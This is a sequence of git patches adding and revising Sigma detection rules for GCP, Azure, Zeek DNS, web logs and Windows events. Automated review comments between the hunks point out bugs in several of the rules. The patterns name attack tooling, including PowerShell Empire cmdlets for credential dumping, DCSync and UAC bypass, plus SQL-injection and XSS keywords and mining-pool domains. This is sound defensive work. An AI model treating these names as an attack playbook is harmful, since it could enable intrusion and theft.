-0500 Subject: [PATCH 0340/1367] Create gcp_bucket_modified_or_deleted.yml --- .../gcp/gcp_bucket_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml new file mode 100644 index 00000000..fc83fef1 
--- /dev/null +++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Google Cloud Storage Buckets Modified or Deleted +id: 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 +description: Detects when storage bucket is modified or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.v*.buckets.delete + - storage.v*.buckets.insert + - storage.v*.buckets.update + - storage.v*.buckets.patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From dc386a2eada47c6f30ddbbff08dc641705a43262 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:56:29 -0500 Subject: [PATCH 0341/1367] Create gcp_bucket_enumeration.yml --- rules/cloud/gcp/gcp_bucket_enumeration.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/gcp/gcp_bucket_enumeration.yml diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml new file mode 100644 index 00000000..e52b3695 --- /dev/null +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml 
@@ -0,0 +1,22 @@ +title: Google Cloud Storage Buckets Enumeration +id: e2feb918-4e77-4608-9697-990a1aaf74c3 +description: Detects when storage bucket is enumerated in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/storage/docs/json_api/v1/buckets +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - storage.v*.buckets.list + - storage.v*.buckets.listChannels + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From eaf1bd8962d0cff42121f2524be6c510c503db92 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 21:58:06 -0500 Subject: [PATCH 0342/1367] Update gcp_bucket_enumeration.yml --- rules/cloud/gcp/gcp_bucket_enumeration.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml index e52b3695..07f8e483 100644 --- a/rules/cloud/gcp/gcp_bucket_enumeration.yml +++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml @@ -14,9 +14,9 @@ detection: - storage.v*.buckets.list - storage.v*.buckets.listChannels condition: selection -level: medium +level: low tags: - - attack.impact + - attack.discovery falsepositives: - Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
From 28d3e3f6b917d7c4f8b2eed077e4f7483068b91e Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 14 Aug 2021 22:07:25 -0500
Subject: [PATCH 0343/1367] Update gcp_bucket_enumeration.yml
---
 rules/cloud/gcp/gcp_bucket_enumeration.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/rules/cloud/gcp/gcp_bucket_enumeration.yml b/rules/cloud/gcp/gcp_bucket_enumeration.yml
index 07f8e483..9c075bfc 100644
--- a/rules/cloud/gcp/gcp_bucket_enumeration.yml
+++ b/rules/cloud/gcp/gcp_bucket_enumeration.yml
@@ -11,8 +11,8 @@ logsource:
 detection:
 selection:
 gcp.audit.method_name:
- - storage.v*.buckets.list
- - storage.v*.buckets.listChannels
+ - storage.buckets.list
+ - storage.buckets.listChannels
 condition: selection
 level: low
 tags:
From b5270ddce1057f72decc80f03e892e4b33e5103e Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 14 Aug 2021 22:07:50 -0500
Subject: [PATCH 0344/1367] Update gcp_bucket_modified_or_deleted.yml
---
 rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml
index fc83fef1..416e38ab 100644
--- a/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml
+++ b/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml
@@ -11,10 +11,10 @@ logsource:
 detection:
 selection:
 gcp.audit.method_name:
- - storage.v*.buckets.delete
- - storage.v*.buckets.insert
- - storage.v*.buckets.update
- - storage.v*.buckets.patch
+ - storage.buckets.delete
+ - storage.buckets.insert
+ - storage.buckets.update
+ - storage.buckets.patch
 condition: selection
 level: medium
 tags:
From 68087b80f5757bd5823b739edeffa6fa943e1d05 Mon Sep 17 00:00:00 2001
From: Austin Songer Date: Sat, 14 Aug 2021 22:25:41 -0500 Subject: [PATCH 0345/1367] Create gcp_service_account_modified.yml --- .../gcp/gcp_service_account_modified.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/gcp/gcp_service_account_modified.yml diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml new file mode 100644 index 00000000..172bcc7b --- /dev/null +++ b/rules/cloud/gcp/gcp_service_account_modified.yml @@ -0,0 +1,25 @@ +title: Google Cloud Service Account Modified +id: 6b67c12e-5e40-47c6-b3b0-1e6b571184cc +description: Identifies when a service account is modified in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - *.serviceAccounts.patch + - *.serviceAccounts.create + - *.serviceAccounts.update + - *.serviceAccounts.patch + - *.serviceAccounts.enable + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d0e08aa78bad513fb57a1cd139ca221bb7972403 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:26:21 -0500 Subject: [PATCH 0346/1367] Create gcp_service_account_disabled_or_deleted.yml --- ...cp_service_account_disabled_or_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml 
diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml new file mode 100644 index 00000000..e7df461f --- /dev/null +++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml @@ -0,0 +1,23 @@ +title: Google Cloud Service Account Disabled or Deleted +id: 13f81a90-a69c-4fab-8f07-b5bb55416a9f +description: Identifies when a service account is disabled or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/14 +references: + - https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - *.serviceAccounts.disable + - *.serviceAccounts.delete + condition: selection +level: medium +tags: + - attack.impact + - attack.t1531 +falsepositives: + - Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 552e1544e4f634cbb02e2e6436af91f51d2d5a48 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 14 Aug 2021 22:30:10 -0500 Subject: [PATCH 0347/1367] Update gcp_service_account_modified.yml --- rules/cloud/gcp/gcp_service_account_modified.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml index 172bcc7b..7905e503 100644 --- a/rules/cloud/gcp/gcp_service_account_modified.yml +++ b/rules/cloud/gcp/gcp_service_account_modified.yml 
@@ -11,11 +11,11 @@ logsource:
 detection:
 selection:
 gcp.audit.method_name:
- - *.serviceAccounts.patch
- - *.serviceAccounts.create
- - *.serviceAccounts.update
- - *.serviceAccounts.patch
- - *.serviceAccounts.enable
+ - *serviceAccounts.patch
+ - *serviceAccounts.create
+ - *serviceAccounts.update
+ - *serviceAccounts.patch
+ - *serviceAccounts.enable
 condition: selection
 level: medium
 tags:
From 3e151410ca67ad636e46733e69ff0914d4ed5d00 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 14 Aug 2021 22:31:47 -0500
Subject: [PATCH 0348/1367] Update gcp_service_account_modified.yml
---
 rules/cloud/gcp/gcp_service_account_modified.yml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml
index 7905e503..172bcc7b 100644
--- a/rules/cloud/gcp/gcp_service_account_modified.yml
+++ b/rules/cloud/gcp/gcp_service_account_modified.yml
@@ -11,11 +11,11 @@ logsource:
 detection:
 selection:
 gcp.audit.method_name:
- - *serviceAccounts.patch
- - *serviceAccounts.create
- - *serviceAccounts.update
- - *serviceAccounts.patch
- - *serviceAccounts.enable
+ - *.serviceAccounts.patch
+ - *.serviceAccounts.create
+ - *.serviceAccounts.update
+ - *.serviceAccounts.patch
+ - *.serviceAccounts.enable
 condition: selection
 level: medium
 tags:
From db3eda51ddb1a85ab03ef4bbf49b87cb3237ff29 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 15 Aug 2021 08:02:51 +0200
Subject: [PATCH 0349/1367] fix errors
---
 rules/cloud/gcp/gcp_service_account_modified.yml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)
diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml
index 172bcc7b..5f869897 100644
--- a/rules/cloud/gcp/gcp_service_account_modified.yml
+++ b/rules/cloud/gcp/gcp_service_account_modified.yml
@@ -10,12 +10,12 @@ logsource:
 service: gcp.audit
 detection:
 selection:
- gcp.audit.method_name:
- - *.serviceAccounts.patch
- - *.serviceAccounts.create
- - *.serviceAccounts.update
- - *.serviceAccounts.patch
- - *.serviceAccounts.enable
+ gcp.audit.method_name|endswith:
+ - .serviceAccounts.patch
+ - .serviceAccounts.create
+ - .serviceAccounts.update
+ - .serviceAccounts.disable
+ - .serviceAccounts.enable
 condition: selection
 level: medium
 tags:
From d940417e58219a8b43e227cde0bac50d02187466 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 15 Aug 2021 08:05:03 +0200
Subject: [PATCH 0350/1367] fix error
---
 rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml
index e7df461f..dcc886d4 100644
--- a/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml
+++ b/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml
@@ -10,9 +10,9 @@ logsource:
 service: gcp.audit
 detection:
 selection:
- gcp.audit.method_name:
- - *.serviceAccounts.disable
- - *.serviceAccounts.delete
+ gcp.audit.method_name|endswith:
+ - .serviceAccounts.disable
+ - .serviceAccounts.delete
 condition: selection
 level: medium
 tags:
From f34c3ef9fdfd6a8864a26d4d8c34318605424016 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 15 Aug 2021 08:08:16 +0200
Subject: [PATCH 0351/1367] remove disable as in another rule
---
 rules/cloud/gcp/gcp_service_account_modified.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/cloud/gcp/gcp_service_account_modified.yml b/rules/cloud/gcp/gcp_service_account_modified.yml
index 5f869897..9b3deb2b 100644
--- a/rules/cloud/gcp/gcp_service_account_modified.yml
+++ b/rules/cloud/gcp/gcp_service_account_modified.yml
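Review bot: The `|endswith` suffixes in the rewritten `gcp.audit.method_name` selection (`.serviceAccounts.patch` and friends here, `.serviceAccounts.disable`/`.serviceAccounts.delete` in the second hunk on this line) are taken from the REST resource paths in the referenced documentation, but Cloud Audit Logs usually record IAM admin calls in `protoPayload.methodName` as RPC names of the form `google.iam.admin.v1.<Verb>ServiceAccount`, which none of these suffixes would match. Before either rule leaves `status: experimental` it should be validated against an exported audit log entry for one of these operations, and the `references` list should cite the log format the method names were taken from so the next maintainer can re-check them.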
@@ -14,8 +14,8 @@ detection:
 - .serviceAccounts.patch
 - .serviceAccounts.create
 - .serviceAccounts.update
- - .serviceAccounts.disable
 - .serviceAccounts.enable
+ - .serviceAccounts.undelete
 condition: selection
 level: medium
 tags:
From a75859a976409df0a3c3705f01efba97859eda23 Mon Sep 17 00:00:00 2001
From: frack113 Date: Sun, 15 Aug 2021 16:00:14 +0200 Subject: [PATCH 0352/1367] First commit --- ...reating_number_of_resources_detection.yaml | 20 + .../azure_granting_permission_detection.yml | 20 + rules/cloud/azure/azure_rare_operations.yml | 25 ++ rules/network/zeek/zeek_dns_mining_pools.yml | 43 +++ rules/network/zeek/zeek_dns_torproxy.yml | 21 + rules/web/sql_injection_keywords.yml | 23 ++ rules/web/xss_keywords.yml | 24 ++ .../builtin/win_anomaly_process_execution.yml | 22 ++ .../windows/builtin/win_event_log_cleared.yml | 22 ++ .../builtin/win_powershelll_empire.yml | 363 ++++++++++++++++++ .../builtin/win_user_acc_added_removed.yml | 25 ++ .../builtin/win_user_acc_created_deleted.yml | 18 + .../builtin/win_user_acc_enabled_disabled.yml | 20 + ...in_user_created_added_to_bultin_admins.yml | 21 + 14 files changed, 667 insertions(+) create mode 100644 rules/cloud/azure/azure_creating_number_of_resources_detection.yaml create mode 100644 rules/cloud/azure/azure_granting_permission_detection.yml create mode 100644 rules/cloud/azure/azure_rare_operations.yml create mode 100644 rules/network/zeek/zeek_dns_mining_pools.yml create mode 100644 rules/network/zeek/zeek_dns_torproxy.yml create mode 100644 rules/web/sql_injection_keywords.yml create mode 100644 rules/web/xss_keywords.yml create mode 100644 rules/windows/builtin/win_anomaly_process_execution.yml create mode 100644 rules/windows/builtin/win_event_log_cleared.yml create mode 100644 rules/windows/builtin/win_powershelll_empire.yml create mode 100644 rules/windows/builtin/win_user_acc_added_removed.yml create mode 100644 rules/windows/builtin/win_user_acc_created_deleted.yml create mode 100644 rules/windows/builtin/win_user_acc_enabled_disabled.yml create mode 100644 rules/windows/builtin/win_user_created_added_to_bultin_admins.yml 
diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml new file mode 100644 index 00000000..d1a60829 --- /dev/null +++ b/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml @@ -0,0 +1,20 @@ +title: number of resource creation or deployment activities +id: d2d901db-7a75-45a1-bc39-0cbf00812192 +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Number of VM creations or deployment activities occur in Azure via the AzureActivity log. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml +logsource: + service: AzureActivity +detection: + keywords: + - Microsoft.Compute/virtualMachines/write + - Microsoft.Resources/deployments/write + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1098 diff --git a/rules/cloud/azure/azure_granting_permission_detection.yml b/rules/cloud/azure/azure_granting_permission_detection.yml new file mode 100644 index 00000000..cf644a6b --- /dev/null +++ b/rules/cloud/azure/azure_granting_permission_detection.yml @@ -0,0 +1,20 @@ +title: Granting of permissions to an account +id: a622fcd2-4b5a-436a-b8a2-a4171161833c +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml +logsource: + service: AzureActivity +detection: + keywords: + - Microsoft.Authorization/roleAssignments/write + + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1098 
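Review bot: The title and description of `azure_creating_number_of_resources_detection.yaml` describe a count-based anomaly ("number of ... activities"), but its `detection` is a plain `keywords` match with no aggregation in `condition`, so the rule fires on every single `Microsoft.Compute/virtualMachines/write` or `Microsoft.Resources/deployments/write`; either add a `count()` aggregation to `condition` or reword the title/description to say it flags each VM creation or deployment. `azure_granting_permission_detection.yml` in the second hunk has the same gap — its description promises an unseen-source-IP baseline that a keyword match cannot provide — and carries a stray blank line inside `detection`. Both rules tag `attack.t1098` (Account Manipulation), which fits role assignments but not VM or deployment writes.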
diff --git a/rules/cloud/azure/azure_rare_operations.yml b/rules/cloud/azure/azure_rare_operations.yml new file mode 100644 index 00000000..caa65c03 --- /dev/null +++ b/rules/cloud/azure/azure_rare_operations.yml @@ -0,0 +1,25 @@ +title: Rare subscription-level operations in Azure +id: c1182e02-49a3-481c-b3de-0fadc4091488 +status: experimental +author: sawwinnnaung +date: 2020/05/07 +description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. +references: + - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AzureActivity/RareOperations.yaml +logsource: + service: AzureActivity +detection: + keywords: -Microsoft.DocumentDB/databaseAccounts/listKeys/action + -Microsoft.Maps/accounts/listKeys/action + -Microsoft.Media/mediaservices/listKeys/action + -Microsoft.CognitiveServices/accounts/listKeys/action + -Microsoft.Storage/storageAccounts/listKeys/action + -Microsoft.Compute/snapshots/write + -Microsoft.Network/networkSecurityGroups/write + + condition: keywords +level: medium +falsepositives: + - Valid change +tags: + - attack.t1003 diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml new file mode 100644 index 00000000..f45df340 --- /dev/null +++ b/rules/network/zeek/zeek_dns_mining_pools.yml 
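Review bot: `keywords: -Microsoft.DocumentDB/databaseAccounts/listKeys/action` in `azure_rare_operations.yml` puts the first value on the key's own line with no space after the dash, and the six `-Microsoft...` lines that follow have the same shape as printed, so YAML reads the block as one plain scalar folded across lines rather than a sequence — the backend would search for the whole concatenated string and the rule could never match. Each operation needs its own line as a list item under `keywords:`, `- Microsoft.DocumentDB/databaseAccounts/listKeys/action`. The `description` is also copied from the permission-granting rule (it talks about users granting access from unseen IPs) and does not describe listKeys, snapshot or NSG writes, which is what the title and the referenced `RareOperations.yaml` are about.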
@@ -0,0 +1,43 @@ +id: bf74135c-18e8-4a72-a926-0e4f47888c19 +title: DNS events related to mining pools +description: | + 'Identifies IPs that may be performing DNS lookups associated with common currency mining pools.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: dns + product: zeek +tags: + - attack.t1035 + - attack.t1496 +detection: + selection: + query: + - 'monerohash.com' + - 'do-dear.com' + - 'xmrminerpro.com' + - 'secumine.net' + - 'xmrpool.com' + - 'minexmr.org' + - 'hashanywhere.com' + - 'xmrget.com' + - 'mininglottery.eu' + - 'minergate.com' + - 'moriaxmr.com' + - 'multipooler.com' + - 'moneropools.com' + - 'xmrpool.eu' + - 'coolmining.club' + - 'supportxmr.com' + - 'minexmr.com' + - 'coinfoundry.org' + - 'cryptoknight.cc' + - 'fairhash.org' + - 'baikalmine.com' + - 'tubepool.xyz' + - 'fairpool.xyz' + - 'asiapool.io' + condition: selection +fields: + - clientip diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml new file mode 100644 index 00000000..1249c6ad --- /dev/null +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -0,0 +1,21 @@ +id: a8322756-015c-42e7-afb1-436e85ed3ff5 +title: DNS tor proxies +description: | + 'Identifies IPs performing DNS lookups associated with common Tor proxies.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: dns + product: zeek +tags: + - attack.t1048 +detection: + selection: + query: + - 'tor2web.*' + - 'onion.*' + - '*tor-gateways*' + condition: selection +fields: + - clientip diff --git a/rules/web/sql_injection_keywords.yml b/rules/web/sql_injection_keywords.yml new file mode 100644 index 00000000..f1dd7972 --- /dev/null +++ b/rules/web/sql_injection_keywords.yml 
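Review bot: `query:` in `zeek_dns_mining_pools.yml` is an exact match on the bare pool domains, but miner configurations generally resolve a host beneath the pool domain (constructed example: `pool.<pool-domain>`), so an exact match on `minexmr.com` misses those lookups; `query|endswith:` with a leading dot, e.g. `- '.minexmr.com'`, covers subdomains without matching look-alike names. `zeek_dns_torproxy.yml` in the next hunk has the inverse problem: `'tor2web.*'` and `'onion.*'` are anchored at the start of the name, so a constructed lookup like `example.tor2web.org` or a name ending in `.onion` would not match — `|contains` or `|endswith` is probably what was intended. Both files also use `reference:`/`severity:` instead of Sigma's `references:`/`level:` and lack `status` and `date`, and `attack.t1035` has been retired in ATT&CK, so the mining rule should keep only `attack.t1496` or map to the current technique id.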
@@ -0,0 +1,23 @@ +title: Detect sql injection by keywords +id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453 +status: experimental +description: Detects sql injection that use GET requests by keyword searches in URL strings +author: Saw Win Naung +date: 2020/02/22 +logsource: + category: webserver +detection: + keywords: + - '=select' + - '=union' + - '=concat' + condition: keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Java scripts and CSS Files + - User searches in search boxes of the respective website +level: high diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml new file mode 100644 index 00000000..2c17f38b --- /dev/null +++ b/rules/web/xss_keywords.yml @@ -0,0 +1,24 @@ +title: Detect XSS Attempts by keywords +id: 553a450b8-604d-41a9-8587-a28334aaddfb +status: experimental +description: Detects XSS that use GET requests by keyword searches in URL strings +author: Saw Win Naung +date: 2020/02/22 +logsource: + category: webserver +detection: + keywords: + - '=cookie' + - '=script' + - '=onload' + - '=onmouseover' + condition: keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Java scripts,CSS Files and PNG files + - User searches in search boxes of the respective website +level: high diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml new file mode 100644 index 00000000..1a38f02a --- /dev/null +++ b/rules/windows/builtin/win_anomaly_process_execution.yml 
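Review bot: `id: 553a450b8-604d-41a9-8587-a28334aaddfb` in `xss_keywords.yml` is not a valid UUID — the first group has nine hex digits instead of eight — so tooling that validates or deduplicates rules by `id` will reject the file; generate a fresh UUID rather than trimming a digit. Both keyword rules match bare tokens such as `=select` and `=script` anywhere in a webserver log line at `level: high`, while their own `falsepositives` entries (search boxes, static assets) are everyday traffic; `medium` would reflect the fidelity better, or the match should be scoped to a URL/query field via `|contains`.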
@@ -0,0 +1,22 @@ +title: Process execution anomaly +id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 +description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.execution + - attack.t1064 +detection: + selection: + EventID: 4688 + NewProcessName|contains: + - 'powershell.exe' + - 'cmd.exe' + - 'wmic.exe' + - 'psexec.exe' + - 'cacls.exe' + - 'rundll.exe' + condition: selection diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml new file mode 100644 index 00000000..2540d98e --- /dev/null +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -0,0 +1,22 @@ +id: a122ac13-daf8-4175-83a2-72c387be339d +title: Security Event log cleared +status: experimental +description: | + 'Checks for event id 1102 which indicates the security event log was cleared.' +reference: Azure Sentinel +author: Saw Winn Naung +severity: Medium +logsource: + service: security + product: windows +tags: + + - attack.t1107 +detection: + selection: + EventID: 1102 + condition: selection +fields: + - fields in the log source that are important to investigate further +falsepositives: + - Legitimate administrative activity diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml new file mode 100644 index 00000000..f3883029 --- /dev/null +++ b/rules/windows/builtin/win_powershelll_empire.yml 
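Review bot: `fields: - fields in the log source that are important to investigate further` in `win_event_log_cleared.yml` is the placeholder text from the Sigma rule template rather than a field list; drop the key or name the actual 1102 subject fields (`SubjectUserName`, `SubjectDomainName`). The same file tags `attack.t1107` (File Deletion, since retired), which does not describe clearing the Security log — `attack.defense_evasion` with `attack.t1070.001` is the current mapping — and has a blank line inside `tags`. In the first hunk, `win_anomaly_process_execution.yml` lists `'rundll.exe'` where the binary is `rundll32.exe`, and `references: Azure Sentinel` in both files is a scalar instead of the list of URLs Sigma expects; the Azure rules earlier in this commit show the right shape.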
@@ -0,0 +1,363 @@ +title: Powershell Empire cmdlets seen in command line +id: ef88eb96-861c-43a0-ab16-f3835a97c928 +description: | + 'Identifies instances of PowerShell Empire cmdlets in powershell process command line data.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.execution + - attack.persistence + - attack.t1208 +detection: + selection1: + EventID: 4688 + CommandLine|contains: ' -encodedCommand' + selection2: + CommandLine: + - 'SetDelay' + - 'GetDelay' + - 'Set-LostLimit' + - 'Get-LostLimit' + - 'Set-Killdate' + - 'Get-Killdate' + - 'Set-WorkingHours' + - 'Get-WorkingHours' + - 'Get-Sysinfo' + - 'Add-Servers' + - 'Invoke-ShellCommand' + - 'Start-AgentJob' + - 'Update-Profile' + - 'Get-FilePart' + - 'Encrypt-Bytes' + - 'Decrypt-Bytes' + - 'Encode-Packet' + - 'Decode-Packet' + - 'Send-Message' + - 'Process-Packet' + - 'Process-Tasking' + - 'Get-Task' + - 'Start-Negotiate' + - 'Invoke-DllInjection' + - 'Invoke-ReflectivePEInjection' + - 'Invoke-Shellcode' + - 'Invoke-ShellcodeMSIL' + - 'Get-ChromeDump' + - 'Get-ClipboardContents' + - 'Get-IndexedItem' + - 'Get-Keystrokes' + - 'Invoke-Inveigh' + - 'Invoke-NetRipper' + - 'local:Invoke-PatchDll' + - 'Invoke-NinjaCopy' + - 'Get-Win32Types' + - 'Get-Win32Constants' + - 'Get-Win32Functions' + - 'Sub-SignedIntAsUnsigned' + - 'Add-SignedIntAsUnsigned' + - 'Compare-Val1GreaterThanVal2AsUInt' + - 'Convert-UIntToInt' + - 'Test-MemoryRangeValid' + - 'Write-BytesToMemory' + - 'Get-DelegateType' + - 'Get-ProcAddress' + - 'Enable-SeDebugPrivilege' + - 'Invoke-CreateRemoteThread' + - 'Get-ImageNtHeaders' + - 'Get-PEBasicInfo' + - 'Get-PEDetailedInfo' + - 'Import-DllInRemoteProcess' + - 'Get-RemoteProcAddress' + - 'Copy-Sections' + - 'Update-MemoryAddresses' + - 'Import-DllImports' + - 'Get-VirtualProtectValue' + - 'Update-MemoryProtectionFlags' + - 'Update-ExeFunctions' + - 'Copy-ArrayOfMemAddresses' + - 'Get-MemoryProcAddress' + - 'Invoke-MemoryLoadLibrary' + 
- 'Invoke-MemoryFreeLibrary' + - 'Out-Minidump' + - 'Get-VaultCredential' + - 'Invoke-DCSync' + - 'Translate-Name' + - 'Get-NetDomain' + - 'Get-NetForest' + - 'Get-NetForestDomain' + - 'Get-DomainSearcher' + - 'Get-NetComputer' + - 'Get-NetGroupMember' + - 'Get-NetUser' + - 'Invoke-Mimikatz' + - 'Invoke-PowerDump' + - 'Invoke-TokenManipulation' + - 'Exploit-JMXConsole' + - 'Exploit-JBoss' + - 'Invoke-Thunderstruck' + - 'Invoke-VoiceTroll' + - 'Set-WallPaper' + - 'Invoke-PsExec' + - 'Invoke-SSHCommand' + - 'Invoke-PSInject' + - 'Invoke-RunAs' + - 'Invoke-SendMail' + - 'Invoke-Rule' + - 'Get-OSVersion' + - 'Select-EmailItem' + - 'View-Email' + - 'Get-OutlookFolder' + - 'Get-EmailItems' + - 'Invoke-MailSearch' + - 'Get-SubFolders' + - 'Get-GlobalAddressList' + - 'Invoke-SearchGAL' + - 'Get-SMTPAddress' + - 'Disable-SecuritySettings' + - 'Reset-SecuritySettings' + - 'Get-OutlookInstance' + - 'New-HoneyHash' + - 'Set-MacAttribute' + - 'Invoke-PatchDll' + - 'Get-SecurityPackages' + - 'Install-SSP' + - 'Invoke-BackdoorLNK' + - 'New-ElevatedPersistenceOption' + - 'New-UserPersistenceOption' + - 'Add-Persistence' + - 'Invoke-CallbackIEX' + - 'Add-PSFirewallRules' + - 'Invoke-EventLoop' + - 'Invoke-PortBind' + - 'Invoke-DNSLoop' + - 'Invoke-PacketKnock' + - 'Invoke-CallbackLoop' + - 'Invoke-BypassUAC' + - 'Get-DecryptedCpassword' + - 'Get-GPPInnerFields' + - 'Invoke-WScriptBypassUAC' + - 'Get-ModifiableFile' + - 'Get-ServiceUnquoted' + - 